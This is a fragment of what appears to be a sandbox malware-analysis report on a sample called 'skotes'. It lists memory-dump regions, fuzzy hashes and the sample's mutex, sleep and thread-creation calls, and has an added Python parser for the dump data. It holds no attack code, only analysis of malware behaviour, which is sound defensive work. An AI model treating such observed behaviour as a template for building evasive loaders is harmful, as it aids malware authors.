                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 396266464-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 89638d7c6f4c63a12648537905001a8ccc24b212a211499cc9c892748c12ab39
                                                                                                                                                                                                                                          • Instruction ID: 380b16e1574b469cbff575cdf6d83e314777c83fea80978621c376959426afb6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89638d7c6f4c63a12648537905001a8ccc24b212a211499cc9c892748c12ab39
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A311571B002008BEF08EBBCD88DB6DB7ABEB85314F24461CE014DBBD6C73589818796
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 0069A685
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: AttributesCreateFileMutexSleep
• String ID: T2o
• API String ID: 396266464-2760472518
• Opcode ID: 6d894d88bd49ae66491ad477db99e3fc0cc791bb723fa83de25a76bd0d495ee9
• Instruction ID: e9ad77eca79aadea1371c198581988f6d896094ec8deb61ee05a7dbaf168dc87
• Opcode Fuzzy Hash: 6d894d88bd49ae66491ad477db99e3fc0cc791bb723fa83de25a76bd0d495ee9
• Instruction Fuzzy Hash: 73311531A102009BEF089BBCDD89B6DB7FBEB85310F244658E0149BBD5C77589808696
APIs
• GetFileAttributesA.KERNEL32(00000000), ref: 0069A7BA
• Sleep.KERNEL32(00000064,?), ref: 0069A963
• CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 396266464-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 7553468de5bf7e76a137e64e22dbd06e9b844e064e3f12514ede982e34405cba
                                                                                                                                                                                                                                          • Instruction ID: 62d50e287bf7dfb6b11c4e05e7be5de53398e0d91706db0e35226216bc36daad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7553468de5bf7e76a137e64e22dbd06e9b844e064e3f12514ede982e34405cba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65310931B502048BEF08DBBCDE8DBADB7ABAB85310F24465CE0149BBD5D73549818796
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
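The dump names and API lines in the function entry above are machine-generated and dense to read by eye. As an added helper, not part of the Joe Sandbox report or its tooling, the following Python parses both into structured records: it decodes the dotted `.sdmp` fields and the `Name.MODULE(args), ref: ADDR` call lines, flags regions whose page protection is writable and executable, and converts `Sleep` arguments to milliseconds. The field order assumed for `.sdmp` names (process index, dump index, region id, base address, page protection, state, type, module index) is an assumption, not documented on this page; the protection and `MEM_IMAGE` constants are the winnt.h values. The sample lines are copied from the entry above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Page-protection values from winnt.h; the low byte of the assumed
# "protect" field of an .sdmp name is decoded against these.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_IMAGE = 0x01000000  # MEMORY_BASIC_INFORMATION.Type of a mapped PE image

# ASSUMED field order of a Joe Sandbox .sdmp name (not documented on the page):
# proc.dump.region_id.base.protect.state.type.index
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<dump>[0-9A-F]{8})\.(?P<region>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<state>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<index>[0-9A-F]{8})\.sdmp",
    re.IGNORECASE,
)
# "Name.MODULE(arg,arg,...), ref: ADDR" as printed in the report's APIs lists
API_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-F]+)",
    re.IGNORECASE,
)


@dataclass
class DumpRegion:
    proc: int
    dump: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:08X}")

    @property
    def is_image(self) -> bool:
        return self.mem_type == MEM_IMAGE

    @property
    def writable_executable(self) -> bool:
        # RWX or copy-on-write+execute pages inside an image are code that can
        # be rewritten in place, which is what an in-memory unpacker needs.
        return (self.protect & 0xFF) in (0x40, 0x80)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]  # None where the report printed "?" (unresolved)
    ref: int


def parse_sdmp(line: str) -> Optional[DumpRegion]:
    m = SDMP_RE.search(line)
    if m is None:
        return None
    return DumpRegion(int(m["proc"], 16), int(m["dump"], 16), int(m["base"], 16),
                      int(m["protect"], 16), int(m["type"], 16))


def parse_api_call(line: str) -> Optional[ApiCall]:
    m = API_RE.search(line)
    if m is None:
        return None
    args: List[Optional[int]] = []
    for a in m["args"].split(","):
        a = a.strip()
        args.append(int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else None)
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16))


def sleep_ms(call: ApiCall) -> Optional[int]:
    """First argument of kernel32!Sleep is dwMilliseconds."""
    if call.api == "Sleep" and call.args and call.args[0] is not None:
        return call.args[0]
    return None


def writable_executable_regions(lines) -> List[DumpRegion]:
    regions = [r for r in map(parse_sdmp, lines) if r is not None]
    return [r for r in regions if r.writable_executable]


# Lines copied from the report entry above (process 3, image at 0x690000).
REPORT_LINES = [
    "Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true",
    "Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp",
    "Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp",
    "Sleep.KERNEL32(00000064,?), ref: 0069A963",
    "CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981",
]

if __name__ == "__main__":
    for r in writable_executable_regions(REPORT_LINES):
        print(f"proc {r.proc} base 0x{r.base:08X} {r.protect_name} image={r.is_image}")
    for line in REPORT_LINES:
        c = parse_api_call(line)
        if c:
            print(f"{c.module}!{c.api} @ 0x{c.ref:08X} args={c.args} sleep_ms={sleep_ms(c)}")
```

Run over the full entry, the helper lists every region of the 0x690000 image whose protection byte is 0x40 or 0x80 alongside the 0x04 data pages, and turns `Sleep.KERNEL32(00000064,?)` into a 100 ms delay. The subcall line (`Part of subcall function ...: RtlWakeAllConditionVariable.NTDLL ref: ...`) has no argument list in the report, so `parse_api_call` returns `None` for it rather than guessing.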
Similarity
• API ID: CreateMutexSleep
• String ID: T2o
• API String ID: 1464230837-2760472518
• Opcode ID: 0196600cb1ab63da512e337035965f4faf32cd213bd1b5c41af7a5744f935506
• Instruction ID: a2df15858e05555c91f39cd65ebb32d8c6ecf978edec53957b1efc15333fb4db
• Opcode Fuzzy Hash: 0196600cb1ab63da512e337035965f4faf32cd213bd1b5c41af7a5744f935506
• Instruction Fuzzy Hash: 73E08620BA931096EF5076ACA88DF7A629B97D9710F211A18A608D66D5C750465082A7
APIs
• Sleep.KERNEL32(00000064,440B685B,?,00000000,006D9138,000000FF), ref: 006975CC
• CreateThread.KERNEL32(00000000,00000000,00697430,006F8638,00000000,00000000,?,?,?,?,?,?,?,?), ref: 006976BE
• Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006976C9
  • Part of subcall function 006AD0C7: RtlWakeAllConditionVariable.NTDLL ref: 006AD17B
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Sleep$ConditionCreateThreadVariableWake
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 79123409-0
                                                                                                                                                                                                                                          • Opcode ID: c182a873c6388d42e768ad253d69210421da31ebecc91b82e1854a33f40e61d1
                                                                                                                                                                                                                                          • Instruction ID: 8b1659fbfd22da7653775a4b82b772aea4ae84f311f8e9f0736f8d9bb881913a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c182a873c6388d42e768ad253d69210421da31ebecc91b82e1854a33f40e61d1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6651CF70214248AFEB18DF28DC85BAC3BA7EB45704F504659F9058B7D1CB7AE980CF95
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __Cnd_destroy_in_situ.LIBCPMT ref: 006A7AF8
                                                                                                                                                                                                                                          • __Mtx_destroy_in_situ.LIBCPMT ref: 006A7B01
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
